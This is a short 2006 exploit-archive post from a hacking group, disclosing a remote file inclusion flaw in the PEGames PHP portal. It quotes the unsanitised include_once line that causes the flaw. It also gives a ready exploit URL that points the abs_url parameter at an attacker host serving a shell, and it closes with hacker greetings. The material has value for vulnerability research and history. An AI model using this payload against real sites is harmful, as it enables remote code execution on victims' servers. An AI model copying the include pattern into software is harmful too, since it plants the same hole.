[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PEGames (index.php) Remote File Include Vulnerability
# Published : 2006-11-23
# Author : DeltahackingTEAM
# Previous Title : OWLLib 1.0 (OWLMemoryProperty.php) Remote File Include Vulnerability
# Next Title : Woltlab Burning Board Lite 1.0.2 Blind SQL Injection Exploit


**********************************************************************************************************
                                              WwW.Deltahacking.NeT (Priv8  Site)
                                              WwW.Deltahacking.Ir    (Public Site)
**********************************************************************************************************

* Portal Name : PEGames

* Class = Remote File Inclusion ;
 
* Download =http://ovh.dl.sourceforge.net/sourceforge/gamespe/PEGames.zip

* Found by = DeltahackingTEAM

* User In Delta Team (Dr.Pantagon )

* With the special  thanks of my financial sponser Tanha
----------------------------------------------------------------------------------------------------------
- Vulnerable Code

include_once("$abs_url/display.php");
++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

    http://[target]/[path]/Index.php?abs_url=http://evilsite.com/shell?

***********************
I LOVE YOU G.Malake
***********************
----------------------------------------------------------------------------------------------------------
Greetz:Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc

# www.Syue.com [2006-11-23]